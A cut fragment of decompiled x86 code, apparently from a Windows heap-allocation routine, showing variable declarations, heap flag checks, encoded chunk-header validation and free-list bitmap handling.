				intOrPtr _v260;
				signed int* _v264;
				signed int _v268;
				intOrPtr _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed short _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				intOrPtr _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed short _v340;
				signed short _v348;
				signed int _v356;
				signed short _v364;
				signed short _v372;
				signed short _v380;
				signed short _v388;
				signed short _v396;
				signed short _v404;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t980;
				signed int _t985;
				char* _t988;
				signed int _t994;
				signed int _t998;
				signed int _t1004;
				signed char* _t1005;
				signed int _t1006;
				signed char* _t1007;
				signed int _t1008;
				signed char* _t1009;
				signed int _t1011;
				intOrPtr _t1012;
				signed int _t1026;
				signed char* _t1027;
				intOrPtr _t1036;
				signed int _t1037;
				signed char* _t1038;
				intOrPtr _t1047;
				signed int _t1052;
				signed int _t1053;
				intOrPtr _t1055;
				signed short* _t1056;
				signed int* _t1059;
				unsigned int* _t1066;
				signed int _t1069;
				signed int _t1071;
				signed int _t1073;
				signed short _t1075;
				void* _t1076;
				signed short _t1079;
				signed int _t1081;
				signed short _t1083;
				signed int* _t1085;
				signed char* _t1088;
				signed int _t1090;
				signed int _t1101;
				intOrPtr* _t1102;
				signed int _t1104;
				signed int _t1108;
				signed int _t1118;
				unsigned int _t1125;
				signed int _t1134;
				signed char _t1135;
				signed short _t1143;
				signed char _t1147;
				signed short _t1148;
				void* _t1149;
				signed short _t1154;
				signed int _t1157;
				intOrPtr* _t1163;
				intOrPtr* _t1164;
				signed int _t1171;
				signed int _t1172;
				intOrPtr* _t1180;
				intOrPtr* _t1181;
				signed int _t1184;
				signed int _t1189;
				signed short _t1191;
				intOrPtr _t1197;
				signed int _t1202;
				signed int _t1205;
				signed int _t1208;
				intOrPtr* _t1216;
				signed int _t1219;
				signed int* _t1226;
				signed int* _t1227;
				signed int _t1230;
				signed int _t1231;
				signed int _t1237;
				signed short* _t1241;
				signed int _t1249;
				signed int _t1250;
				signed int _t1252;
				signed short* _t1253;
				signed short* _t1257;
				signed int _t1263;
				signed int _t1265;
				signed short _t1266;
				signed int _t1269;
				signed int _t1271;
				signed int _t1274;
				signed short _t1302;
				signed short _t1306;
				intOrPtr _t1312;
				signed int _t1316;
				signed int _t1321;
				signed int _t1327;
				signed int _t1328;
				signed int _t1332;
				signed short* _t1334;
				signed short _t1336;
				signed int* _t1337;
				signed int _t1349;
				signed int _t1356;
				signed short _t1378;
				void* _t1379;
				signed short _t1384;
				signed int _t1385;
				signed int _t1389;
				intOrPtr* _t1391;
				signed short _t1393;
				signed int* _t1394;
				signed int _t1406;
				signed int _t1413;
				intOrPtr* _t1417;
				signed char _t1419;
				signed int _t1421;
				signed int _t1423;
				char _t1429;
				void* _t1436;
				signed int _t1440;
				signed int _t1441;
				signed short _t1443;
				signed int _t1444;
				unsigned int _t1447;
				signed int _t1449;
				signed short _t1450;
				signed int _t1452;
				signed short _t1454;
				signed short _t1455;
				signed char _t1464;
				signed int _t1469;
				unsigned int _t1472;
				intOrPtr* _t1473;
				signed int _t1482;
				signed int _t1484;
				signed int _t1486;
				signed int _t1487;
				signed short _t1495;
				intOrPtr _t1496;
				signed short _t1498;
				signed char _t1499;
				signed int _t1500;
				signed short* _t1501;
				signed int _t1502;
				signed short* _t1505;
				signed char* _t1510;
				signed char _t1513;
				intOrPtr _t1517;
				signed int* _t1518;
				signed char _t1519;
				signed int _t1520;
				signed short _t1521;
				intOrPtr _t1522;
				signed short _t1524;
				signed int _t1526;
				intOrPtr* _t1528;
				signed int _t1530;
				intOrPtr* _t1533;
				signed char _t1536;
				intOrPtr _t1537;
				intOrPtr _t1542;
				signed char _t1548;
				intOrPtr* _t1550;
				signed int _t1553;
				signed int _t1555;
				intOrPtr _t1564;
				intOrPtr _t1565;
				signed int _t1567;
				signed int _t1569;
				signed int _t1570;
				unsigned int _t1573;
				signed int _t1576;
				signed int _t1578;
				intOrPtr _t1599;
				signed int _t1605;
				signed short _t1608;
				void* _t1609;
				signed int _t1611;
				signed short _t1612;
				signed short _t1635;
				intOrPtr _t1636;
				signed short _t1638;
				signed short _t1641;
				signed int _t1643;
				signed int _t1646;
				signed int _t1653;
				unsigned int _t1661;
				signed int _t1662;
				intOrPtr _t1667;
				signed int _t1670;
				signed int _t1672;
				signed int _t1674;
				signed int _t1677;
				signed short _t1679;
				signed int _t1680;
				signed short* _t1688;
				signed int _t1690;
				signed short _t1691;
				intOrPtr _t1693;
				signed int _t1695;
				signed short _t1696;
				intOrPtr _t1698;
				signed short _t1700;
				unsigned int _t1705;
				signed int _t1708;
				intOrPtr _t1709;
				signed short _t1711;
				signed int _t1712;
				signed int _t1714;
				signed int _t1715;
				signed short _t1719;
				signed int _t1721;
				signed short _t1723;
				signed short _t1724;
				signed short _t1725;
				signed int _t1727;
				signed int _t1729;
				signed short _t1730;
				signed int _t1738;
				intOrPtr _t1739;
				signed short _t1743;
				unsigned int _t1745;
				signed int _t1757;
				signed char _t1767;
				signed int _t1768;
				signed char _t1771;
				signed int _t1774;
				signed short _t1775;
				signed int _t1777;
				signed short _t1778;
				signed int _t1784;
				unsigned int _t1789;
				signed int _t1790;
				signed int _t1791;
				intOrPtr* _t1792;
				signed int _t1793;
				signed int* _t1794;
				signed short* _t1795;
				signed int _t1796;
				signed short* _t1797;
				signed int* _t1798;
				short* _t1799;
				intOrPtr _t1800;
				signed int _t1801;
				signed short* _t1802;
				intOrPtr _t1803;
				signed int _t1804;
				intOrPtr* _t1805;
				intOrPtr* _t1806;
				signed int _t1807;
				signed int _t1808;
				void* _t1809;
				intOrPtr _t1810;
				signed int _t1812;
				unsigned int _t1814;
				unsigned int* _t1816;
				signed int _t1817;
				signed int _t1818;
				signed int _t1819;
				signed int _t1820;
				signed int* _t1821;
				signed int _t1822;
				signed int _t1825;
				signed int _t1826;
				intOrPtr _t1827;
				signed int _t1828;
				signed int* _t1829;
				signed int _t1830;
				signed int* _t1833;
				intOrPtr _t1834;
				signed int _t1837;
				void* _t1838;
				void* _t1839;
				void* _t1842;
				void* _t1843;
				void* _t1853;

				_t1658 = __edx;
				_t1460 = __ecx;
				_push(0xfffffffe);
				_push(0x1d8ac1c8);
				_push(E1D81AD20);
				_push( *[fs:0x0]);
				_t1839 = _t1838 - 0x180;
				_t980 =  *0x1d8cb370;
				_v12 = _v12 ^ _t980;
				_push(_t980 ^ _t1837);
				 *[fs:0x0] =  &_v20;
				_t1440 = __edx;
				_v120 = __edx;
				_t1771 = __ecx;
				_v124 = __ecx;
				_v140 = 0;
				_v116 = 1;
				_v49 = 0;
				_v88 = 0;
				_v68 = 0;
				_v152 = 0;
				_t1784 = _a8 >> 3;
				if((__edx & 0x7d010f60) != 0 || _a4 >= 0x80000000) {
					_v116 = 0;
					 *_a16 = 4;
					_t985 = _a4;
					__eflags = _t985 - 0x7fffffff;
					if(_t985 <= 0x7fffffff) {
						__eflags = _t1440 & 0x61000000;
						if((_t1440 & 0x61000000) == 0) {
							L10:
							__eflags = _t985;
							if(_t985 == 0) {
								_t985 = 1;
							}
							_t1661 =  *((intOrPtr*)(_t1771 + 0x94)) + _t985 &  *(_t1771 + 0x98);
							__eflags = _t1661 - 0x10;
							if(_t1661 < 0x10) {
								_t1661 = 0x10;
							}
							_a8 = _t1661;
							_t1464 = _t1440 >> 0x00000004 & 0xffffffe1 | 0x00000001;
							_v56 = _t1464;
							__eflags = _t1440 & 0x3c000100;
							if((_t1440 & 0x3c000100) != 0) {
								L16:
								_t1464 = _t1464 | 0x00000002;
								_v56 = _t1464;
								_t1661 = _t1661 + 8;
								__eflags = _t1661;
								_a8 = _t1661;
							} else {
								__eflags =  *(_t1771 + 0xbc);
								if( *(_t1771 + 0xbc) != 0) {
									goto L16;
								}
							}
							_t1662 = _t1661 >> 3;
							__eflags = _t1662;
							_v40 = _t1662;
							goto L18;
						} else {
							__eflags = _t1440 & 0x10000000;
							if(__eflags != 0) {
								goto L10;
							} else {
								_t1436 = E1D87F0A5(_t1440, _t1460, _t1658, _t1771, _t1784, __eflags, _t985);
								 *[fs:0x0] = _v20;
								return _t1436;
							}
						}
					} else {
						__eflags = 0;
						 *[fs:0x0] = _v20;
						return 0;
					}
				} else {
					_t1464 = 1;
					_v56 = 1;
					_t1662 = _t1784;
					_v40 = _t1662;
					if(_t1662 < 2) {
						_a8 = _a8 + 8;
						_t1662 = 2;
						_v40 = 2;
					}
					 *_a16 = 3;
					L18:
					_t1441 = _t1440 & 0x00800000;
					if(_t1441 != 0 && ( *( *[fs:0x30] + 0x68) & 0x00000800) == 0) {
						_t1464 = _t1464 | 0x00000008;
						_v56 = _t1464;
					}
					_v8 = 0;
					_t1851 = _v120 & 0x00000001;
					if((_v120 & 0x00000001) != 0) {
						L30:
						__eflags = _t1662 -  *((intOrPtr*)(_t1771 + 0x5c));
						if(_t1662 >  *((intOrPtr*)(_t1771 + 0x5c))) {
							__eflags =  *(_t1771 + 0x40) & 0x00000002;
							if(( *(_t1771 + 0x40) & 0x00000002) == 0) {
								_v180 = 0xc0000023;
								goto L516;
							} else {
								_t1789 = _a8 + 0x18;
								_a8 = _t1789;
								_a8 = _t1789;
								_t898 = _t1789 + 0xfff; // 0xfe7
								_t1469 = _t898 & 0xfffff000;
								_t994 = E1D8068EA( *((intOrPtr*)(_t1771 + 0x1f8)) -  *((intOrPtr*)(_t1771 + 0x244)), _t1771, _t1771 + 0xd4);
								__eflags = _t994;
								if(_t994 != 0) {
									_v328 = (E1D7D2330(_t1469) & 0x0000000f) << 0xc;
									_t1666 =  &_a8;
									_t998 = E1D827948(_t1771,  &_a8, (E1D7D2330(_t1469) & 0x0000000f) << 0xc,  &_v256);
									_t1790 = _t998;
									_v68 = _t1790;
									__eflags = _t1790;
									if(_t1790 != 0) {
										_t1791 = _v68;
										_t1472 = _a8;
										 *(_t1791 + 0x18) = _t1472 - _a4;
										 *(_t1791 + 0x1a) = _v56 | 0x00000002;
										 *(_t1791 + 0x10) = _t1472;
										 *((intOrPtr*)(_t1791 + 0x14)) = _v256;
										 *((char*)(_t1791 + 0x1f)) = 4;
										 *((intOrPtr*)(_t1771 + 0x200)) =  *((intOrPtr*)(_t1771 + 0x200)) + _t1472;
										_t1004 = E1D7E3C40();
										__eflags = _t1004;
										if(_t1004 == 0) {
											_t1005 = 0x7ffe0380;
										} else {
											_t1005 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										__eflags =  *_t1005;
										if( *_t1005 != 0) {
											_t1047 =  *[fs:0x30];
											__eflags =  *(_t1047 + 0x240) & 0x00000001;
											if(( *(_t1047 + 0x240) & 0x00000001) != 0) {
												_t1666 = _v68;
												E1D88EFD3(_t1441, _t1771, _v68, _a8, 9);
											}
										}
										_t1006 = E1D7E3C40();
										__eflags = _t1006;
										if(_t1006 == 0) {
											_t1007 = 0x7ffe0380;
										} else {
											_t1007 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										__eflags =  *_t1007;
										if( *_t1007 != 0) {
											_t1036 =  *[fs:0x30];
											__eflags =  *(_t1036 + 0x240) & 0x00000001;
											if(( *(_t1036 + 0x240) & 0x00000001) != 0) {
												_t1037 = E1D7E3C40();
												__eflags = _t1037;
												if(_t1037 == 0) {
													_t1038 = 0x7ffe0380;
												} else {
													_t1038 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
												}
												__eflags =  *(_t1771 + 0x74) << 3;
												_t1666 = _v68;
												E1D88F1C3(_t1441, _t1771, _v68,  *(_t1771 + 0x74) << 3, _a8,  *(_t1771 + 0x74) << 3,  *_t1038 & 0x000000ff);
											}
										}
										_t1008 = E1D7E3C40();
										__eflags = _t1008;
										if(_t1008 == 0) {
											_t1009 = 0x7ffe038a;
										} else {
											_t1009 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										}
										__eflags =  *_t1009;
										if( *_t1009 != 0) {
											_t1026 = E1D7E3C40();
											__eflags = _t1026;
											if(_t1026 == 0) {
												_t1027 = 0x7ffe038a;
											} else {
												_t1027 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
											}
											__eflags =  *(_t1771 + 0x74) << 3;
											_t1666 = _v68;
											E1D88F1C3(_t1441, _t1771, _v68,  *(_t1771 + 0x74) << 3, _a8,  *(_t1771 + 0x74) << 3,  *_t1027 & 0x000000ff);
										}
										__eflags =  *(_t1771 + 0x40) & 0x08000000;
										if(( *(_t1771 + 0x40) & 0x08000000) != 0) {
											 *((short*)(_v68 + 8)) = E1D7FFDB9(1, _t1666);
										}
										_t1011 =  *( *[fs:0x30] + 0x68);
										_v332 = _t1011;
										__eflags = _t1011 & 0x00000800;
										if((_t1011 & 0x00000800) != 0) {
											__eflags = _v120 >> 0x12;
											 *((short*)(_v68 + 0xa)) = E1D879AFE(_t1771, _v120 >> 0x00000012 & 0x000000ff, 0,  *(_t1791 + 0x10) >> 3, 1);
										}
										__eflags =  *(_t1771 + 0x4c);
										if( *(_t1771 + 0x4c) != 0) {
											 *(_t1791 + 0x1b) =  *(_t1791 + 0x1a) ^  *(_t1791 + 0x19) ^  *(_t1791 + 0x18);
											_t960 = _t1791 + 0x18;
											 *_t960 =  *(_t1791 + 0x18) ^  *(_t1771 + 0x50);
											__eflags =  *_t960;
										}
										_t1012 = _t1771 + 0x9c;
										_t1473 =  *((intOrPtr*)(_t1012 + 4));
										_t1667 =  *_t1473;
										__eflags = _t1667 - _t1012;
										if(_t1667 != _t1012) {
											__eflags = 0;
											E1D895FED(0xd, 0, _t1012, 0, _t1667, 0);
										} else {
											_t1792 = _v68;
											 *_t1792 = _t1012;
											 *((intOrPtr*)(_t1792 + 4)) = _t1473;
											 *_t1473 = _t1792;
											 *((intOrPtr*)(_t1012 + 4)) = _t1792;
										}
										_v88 = _v68 + 0x20;
									} else {
										_v88 = _t998;
										 *((intOrPtr*)(_t1771 + 0x224)) =  *((intOrPtr*)(_t1771 + 0x224)) + 1;
									}
								} else {
									_v180 = 0xc000012d;
									goto L516;
								}
							}
						} else {
							__eflags = _t1441;
							if(_t1441 == 0) {
								__eflags = _t1784 - ( *(_t1771 + 0xf0) & 0x0000ffff);
								_t1413 = _a4;
								if(_t1784 < ( *(_t1771 + 0xf0) & 0x0000ffff)) {
									__eflags = _t1413 -  *0x1d8c3928; // 0x4000
									if(__eflags <= 0) {
										_t1417 = (_t1784 >> 3) + 0xf2 + _t1771;
										_v72 = _t1417;
										_t1767 =  *_t1417;
										_t1464 = _t1784 & 0x00000007;
										_t1419 = 1 << _t1464;
										__eflags = _t1767 & _t1419;
										if((_t1767 & _t1419) == 0) {
											_t1833 =  *((intOrPtr*)(_t1771 + 0xec)) + _t1784 * 2;
											_v264 = _t1833;
											 *_t1833 =  *_t1833 + 0x21;
											_t1464 =  *_t1833;
											__eflags = _v152;
											if(_v152 != 0) {
												L45:
												_t1421 = _a4;
												__eflags = _t1421;
												_t1768 = _t1421;
												if(_t1421 == 0) {
													_t1768 = 1;
												}
												__eflags =  *((char*)(_t1771 + 0xea)) - 2;
												if( *((char*)(_t1771 + 0xea)) != 2) {
													_t1653 = 0;
													__eflags = 0;
												} else {
													_t1653 =  *(_t1771 + 0xe4);
												}
												_t1423 = E1D7CE2AA(_t1653, _t1768) & 0x0000ffff;
												_t1464 = 0xffff;
												__eflags = _t1423 - 0xffff;
												if(_t1423 == 0xffff) {
													__eflags =  *((char*)(_t1771 + 0xea)) - 2;
													if( *((char*)(_t1771 + 0xea)) != 2) {
														L54:
														_t90 = _t1771 + 0x48;
														 *_t90 =  *(_t1771 + 0x48) | 0x20000000;
														__eflags =  *_t90;
													} else {
														__eflags =  *(_t1771 + 0xe4);
														if( *(_t1771 + 0xe4) == 0) {
															goto L54;
														}
													}
												} else {
													 *_t1833 = _t1423;
													_t1464 = _v72;
													asm("bts eax, ebx");
													 *_t1464 =  *_t1464 & 0x000000ff;
													 *((intOrPtr*)(_t1771 + 0x23c)) =  *((intOrPtr*)(_t1771 + 0x23c)) + 1;
												}
											} else {
												__eflags = (_t1464 & 0x0000001f) - 0x10;
												if((_t1464 & 0x0000001f) > 0x10) {
													L44:
													_v188 = 1;
													goto L45;
												} else {
													__eflags = _t1464 - 0xff00;
													if(_t1464 > 0xff00) {
														goto L44;
													} else {
														_v188 = 0;
													}
												}
											}
										}
										_t1662 = _v40;
									}
								} else {
									__eflags = _t1413 -  *0x1d8c3928; // 0x4000
									if(__eflags <= 0) {
										__eflags =  *((char*)(_t1771 + 0xea)) - 2;
										if( *((char*)(_t1771 + 0xea)) != 2) {
											L36:
											__eflags =  *((char*)(_t1771 + 0xeb)) - 2;
											if( *((char*)(_t1771 + 0xeb)) == 2) {
												 *(_t1771 + 0x48) =  *(_t1771 + 0x48) | 0x20000000;
											}
										} else {
											__eflags =  *(_t1771 + 0xe4) - _t1441;
											if( *(_t1771 + 0xe4) == _t1441) {
												goto L36;
											}
										}
									}
								}
							}
							_t1793 = _a12;
							__eflags = _t1793;
							if(_t1793 == 0) {
								L95:
								_v204 = _t1771 + 0xc0;
								_t1794 =  *(_t1771 + 0xb4);
								_v44 = _t1794;
								while(1) {
									_t1482 = _t1794[1];
									__eflags = _t1662 - _t1482;
									if(_t1662 < _t1482) {
										break;
									}
									_t1052 =  *_t1794;
									__eflags = _t1052;
									if(_t1052 != 0) {
										_t1794 = _t1052;
										_v44 = _t1052;
										continue;
									} else {
										_t1053 = _t1482 - 1;
										L100:
										_v176 = _t1053;
									}
									L101:
									_v72 = _t1053;
									_v80 = _t1053 - _t1794[5];
									_v36 = 0;
									_t1670 = _t1794[6];
									_v96 = _t1670;
									_t1055 =  *((intOrPtr*)(_t1670 + 4));
									__eflags = _t1670 - _t1055;
									if(_t1670 != _t1055) {
										_t1056 = _t1055 + 0xfffffff8;
										_v32 = _t1056;
										_t1443 =  *_t1056;
										_v348 = _t1443;
										__eflags =  *(_t1771 + 0x4c);
										if( *(_t1771 + 0x4c) != 0) {
											_t1443 = _t1443 ^  *(_t1771 + 0x50);
											_v348 = _t1443;
											__eflags = _t1443 >> 0x18 - (_t1443 >> 0x00000010 ^ _t1443 >> 0x00000008 ^ _t1443);
											if(_t1443 >> 0x18 != (_t1443 >> 0x00000010 ^ _t1443 >> 0x00000008 ^ _t1443)) {
												E1D895FED(3, _t1771, _v32, 0, 0, 0);
												_t1670 = _v96;
											}
										}
										_t1484 = _v40 - (_t1443 & 0x0000ffff);
										_v276 = _t1484;
										__eflags = _t1484;
										if(_t1484 <= 0) {
											_t1059 =  *_t1670 + 0xfffffff8;
											_v32 = _t1059;
											_t1444 =  *_t1059;
											_v356 = _t1444;
											__eflags =  *(_t1771 + 0x4c);
											if( *(_t1771 + 0x4c) != 0) {
												_t1444 = _t1444 ^  *(_t1771 + 0x50);
												_v356 = _t1444;
												__eflags = _t1444 >> 0x18 - (_t1444 >> 0x00000010 ^ _t1444 >> 0x00000008 ^ _t1444);
												if(_t1444 >> 0x18 != (_t1444 >> 0x00000010 ^ _t1444 >> 0x00000008 ^ _t1444)) {
													E1D895FED(3, _t1771, _v32, 0, 0, 0);
													_t1670 = _v96;
												}
											}
											_t1486 = _v40 - (_t1444 & 0x0000ffff);
											_v280 = _t1486;
											__eflags = _t1486;
											if(_t1486 > 0) {
												__eflags =  *_t1794;
												if( *_t1794 != 0) {
													L127:
													_t1487 = _v80;
													_t1672 = _t1487 >> 5;
													_v32 = (_t1794[1] - _t1794[5] >> 5) - 1;
													_t1066 = _t1794[7] + _t1672 * 4;
													_t1447 = (_t1444 | 0xffffffff) << (_t1487 & 0x0000001f) &  *_t1066;
													__eflags = _t1447;
													_t1486 = _v32;
													while(1) {
														_v200 = _t1066;
														_v156 = _t1672;
														__eflags = _t1447;
														if(_t1447 != 0) {
															break;
														}
														__eflags = _t1672 - _t1486;
														if(_t1672 > _t1486) {
															__eflags = _t1447;
															if(_t1447 == 0) {
																L475:
																_t1794 =  *_t1794;
																_v44 = _t1794;
																_t1053 = _t1794[5];
																goto L100;
															} else {
																break;
															}
														} else {
															_t1066 =  &(_t1066[1]);
															_t1447 =  *_t1066;
															_t1672 = _t1672 + 1;
															continue;
														}
														goto L143;
													}
													__eflags = _t1447;
													if(_t1447 == 0) {
														_t1069 = _t1447 >> 0x00000010 & 0x000000ff;
														__eflags = _t1069;
														if(_t1069 == 0) {
															_t1071 = ( *((_t1447 >> 0x18) + 0x1d7a89b0) & 0x000000ff) + 0x18;
															__eflags = _t1071;
														} else {
															_t1071 = ( *(_t1069 + 0x1d7a89b0) & 0x000000ff) + 0x10;
														}
													} else {
														_t1356 = _t1447 & 0x000000ff;
														__eflags = _t1447;
														if(_t1447 == 0) {
															_t1071 = ( *((_t1447 >> 0x00000008 & 0x000000ff) + 0x1d7a89b0) & 0x000000ff) + 8;
														} else {
															_t1071 =  *(_t1356 + 0x1d7a89b0) & 0x000000ff;
														}
													}
													_t1674 = (_t1672 << 5) + _t1071;
													_v156 = _t1674;
													__eflags = _t1794[2];
													if(_t1794[2] != 0) {
														_t1674 = _t1674 + _t1674;
														__eflags = _t1674;
													}
													_t1073 =  *(_t1794[8] + _t1674 * 4);
													goto L142;
												} else {
													__eflags = _v72 - _t1794[1] - 1;
													if(_v72 != _t1794[1] - 1) {
														goto L127;
													} else {
														_t1486 = _v80;
														__eflags = _t1794[2];
														if(_t1794[2] != 0) {
															_t1486 = _t1486 + _t1486;
															__eflags = _t1486;
														}
														_t1825 =  *(_t1794[8] + _t1486 * 4);
														while(1) {
															__eflags = _t1670 - _t1825;
															if(_t1670 == _t1825) {
																break;
															}
															_t1752 = _t1825 - 8;
															_t1454 =  *(_t1825 - 8);
															_v364 = _t1454;
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																_t1454 = _t1454 ^  *(_t1771 + 0x50);
																_v364 = _t1454;
																__eflags = _t1454 >> 0x18 - (_t1454 >> 0x00000010 ^ _t1454 >> 0x00000008 ^ _t1454);
																if(_t1454 >> 0x18 != (_t1454 >> 0x00000010 ^ _t1454 >> 0x00000008 ^ _t1454)) {
																	E1D895FED(3, _t1771, _t1752, 0, 0, 0);
																}
															}
															_t1486 = _v40 - (_t1454 & 0x0000ffff);
															_v284 = _t1486;
															__eflags = _t1486;
															if(_t1486 > 0) {
																_t1825 =  *_t1825;
																_t1670 = _v96;
																continue;
															} else {
																_t1073 = _t1825;
																_t1794 = _v44;
																goto L142;
															}
															goto L143;
														}
														_t1073 = _v36;
														_t1794 = _v44;
													}
												}
											} else {
												_t1073 =  *_t1670;
												goto L142;
											}
										} else {
											_t1073 = _t1670;
											goto L142;
										}
									} else {
										_t1073 = _t1670;
										L142:
										_v36 = _t1073;
									}
									L143:
									__eflags = _t1073;
									if(_t1073 == 0) {
										goto L475;
									}
									_v288 = _t1073;
									__eflags = _v204 - _t1073;
									if(_v204 == _t1073) {
										L186:
										_t1441 = E1D7E0445(_t1771, _a8);
										_v92 = _t1441;
										__eflags = _t1441;
										if(_t1441 == 0) {
											_v180 = 0xc0000017;
											L516:
											_v88 = 0;
										} else {
											_t350 = _t1441 + 8; // 0x8
											_t1795 = _t350;
											_t1495 =  *_t1795;
											_v32 = _t1495;
											_t1075 =  *(_t1441 + 0xc);
											_v48 = _t1075;
											_t1076 =  *_t1075;
											_t1496 =  *((intOrPtr*)(_t1495 + 4));
											__eflags = _t1076 - _t1496;
											if(_t1076 != _t1496) {
												L473:
												E1D895FED(0xd, _t1771, _t1795, _t1496, _t1076, 0);
												_v61 = 0;
											} else {
												__eflags = _t1076 - _t1795;
												if(_t1076 != _t1795) {
													goto L473;
												} else {
													 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - ( *_t1441 & 0x0000ffff);
													_t1677 =  *(_t1771 + 0xb4);
													__eflags = _t1677;
													if(_t1677 != 0) {
														_t1605 =  *_t1441 & 0x0000ffff;
														while(1) {
															__eflags = _t1605 -  *((intOrPtr*)(_t1677 + 4));
															if(_t1605 <  *((intOrPtr*)(_t1677 + 4))) {
																break;
															}
															_t1321 =  *_t1677;
															__eflags = _t1321;
															if(_t1321 != 0) {
																_t1677 = _t1321;
																continue;
															} else {
																_t1605 =  *((intOrPtr*)(_t1677 + 4)) - 1;
																__eflags = _t1605;
															}
															break;
														}
														_v216 = _t1605;
														E1D7E036A(_t1771, _t1677, 1, _t1795, _t1605,  *_t1441 & 0x0000ffff);
													}
													_t1079 = _v32;
													_t1498 = _v48;
													 *_t1498 = _t1079;
													 *(_t1079 + 4) = _t1498;
													__eflags =  *(_t1441 + 2) & 0x00000008;
													if(( *(_t1441 + 2) & 0x00000008) == 0) {
														L199:
														_v61 = 1;
														goto L200;
													} else {
														_t1316 = E1D7CF5C7(_t1771, _t1441);
														__eflags = _t1316;
														if(_t1316 != 0) {
															goto L199;
														} else {
															E1D7CF113(_t1771, _t1441,  *_t1441 & 0x0000ffff, 1);
															_v61 = 0;
														}
													}
												}
											}
										}
									} else {
										_t1441 = _t1073 - 8;
										_v92 = _t1441;
										__eflags =  *(_t1771 + 0x4c);
										if( *(_t1771 + 0x4c) != 0) {
											 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
											__eflags =  *(_t1441 + 3) - ( *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441);
											if(__eflags != 0) {
												_push(_t1486);
												E1D88D646(_t1441, _t1771, _t1441, _t1771, _t1794, __eflags);
											}
											_t1073 = _v36;
										}
										_t1819 =  *_t1441 & 0x0000ffff;
										__eflags = _t1819 - _v40;
										if(_t1819 < _v40) {
											__eflags =  *(_t1771 + 0x4c);
											if( *(_t1771 + 0x4c) != 0) {
												 *(_t1441 + 3) =  *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441;
												 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
												__eflags =  *_t1441;
											}
											goto L186;
										} else {
											_t1738 =  *(_t1441 + 8);
											_v128 = _t1738;
											_t1608 =  *(_t1441 + 0xc);
											_v144 = _t1608;
											_t1609 =  *_t1608;
											_t1739 =  *((intOrPtr*)(_t1738 + 4));
											__eflags = _t1609 - _t1739;
											if(_t1609 != _t1739) {
												L183:
												E1D895FED(0xd, _t1771, _t1073, _t1739, _t1609, 0);
												_v58 = 0;
											} else {
												__eflags = _t1609 - _t1073;
												if(_t1609 != _t1073) {
													goto L183;
												} else {
													 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - _t1819;
													_t1611 =  *(_t1771 + 0xb4);
													_v44 = _t1611;
													__eflags = _t1611;
													if(_t1611 != 0) {
														_t1820 =  *_t1441 & 0x0000ffff;
														_v72 = _t1820;
														while(1) {
															_t1743 =  *(_t1611 + 4);
															__eflags = _t1820 - _t1743;
															if(_t1820 < _t1743) {
																break;
															}
															_t1349 =  *_t1611;
															__eflags = _t1349;
															if(_t1349 != 0) {
																_t1611 = _t1349;
																_v44 = _t1611;
																continue;
															} else {
																_t1820 = _t1743 - 1;
																_v72 = _t1820;
															}
															break;
														}
														_v208 = _t1820;
														_v108 =  *_t1441 & 0x0000ffff;
														_t1745 = _t1820 -  *((intOrPtr*)(_t1611 + 0x14));
														_v36 = _t1745;
														__eflags =  *(_t1611 + 8);
														_t1332 = _t1745 + _t1745;
														if( *(_t1611 + 8) == 0) {
															_t1332 = _t1745;
														}
														_t1774 = _t1332 * 4;
														_v80 = _t1774;
														_t1334 =  *((intOrPtr*)(_t1611 + 0x20)) + _t1774;
														_v96 = _t1334;
														_v32 =  *_t1334;
														 *((intOrPtr*)(_t1611 + 0xc)) =  *((intOrPtr*)(_t1611 + 0xc)) - 1;
														_t1336 =  *(_t1611 + 4);
														_t1775 = _t1336 - 1;
														_v48 = _t1775;
														__eflags = _t1820 - _t1775;
														_t1771 = _v124;
														if(_t1820 == _t1775) {
															_t293 = _t1611 + 0x10;
															 *_t293 =  *(_t1611 + 0x10) - 1;
															__eflags =  *_t293;
														}
														_t295 = _t1441 + 8; // 0xddeeddf6
														_t1821 = _t295;
														__eflags = _v32 - _t1821;
														if(_v32 == _t1821) {
															_v212 = _t1336;
															__eflags =  *_t1611;
															if( *_t1611 == 0) {
																_t1336 = _v48;
																_v212 = _t1336;
															}
															_t1822 =  *_t1821;
															_v32 =  *(_t1611 + 0x18);
															__eflags = _v72 - _t1336;
															_t1771 = _v124;
															if(_v72 >= _t1336) {
																_t1337 = _v96;
																__eflags = _t1822 - _v32;
																if(_t1822 == _v32) {
																	 *_t1337 = 0;
																	goto L177;
																} else {
																	 *_t1337 = _t1822;
																	goto L172;
																}
																goto L525;
															} else {
																__eflags = _t1822 -  *(_t1611 + 0x18);
																if(_t1822 ==  *(_t1611 + 0x18)) {
																	L176:
																	 *(_v80 +  *((intOrPtr*)(_t1611 + 0x20))) = 0;
																	L177:
																	_v36 = _t1745 & 0x0000001f;
																	_t333 = _v44 + 0x1c; // 0x0
																	 *( *_t333 + (_t1745 >> 5) * 4) =  *( *_t333 + (_t1745 >> 5) * 4) &  !(1 << _v36);
																} else {
																	_t1450 =  *(_t1822 - 8);
																	_v372 = _t1450;
																	__eflags =  *(_t1771 + 0x4c);
																	if( *(_t1771 + 0x4c) != 0) {
																		_t1450 = _t1450 ^  *(_t1771 + 0x50);
																		_v372 = _t1450;
																		__eflags = _t1450 >> 0x18 - (_t1450 >> 0x00000010 ^ _t1450 >> 0x00000008 ^ _t1450);
																		if(_t1450 >> 0x18 != (_t1450 >> 0x00000010 ^ _t1450 >> 0x00000008 ^ _t1450)) {
																			E1D895FED(3, _t1771, _t1822 - 8, 0, 0, 0);
																			_t1745 = _v36;
																		}
																		_t1611 = _v44;
																	}
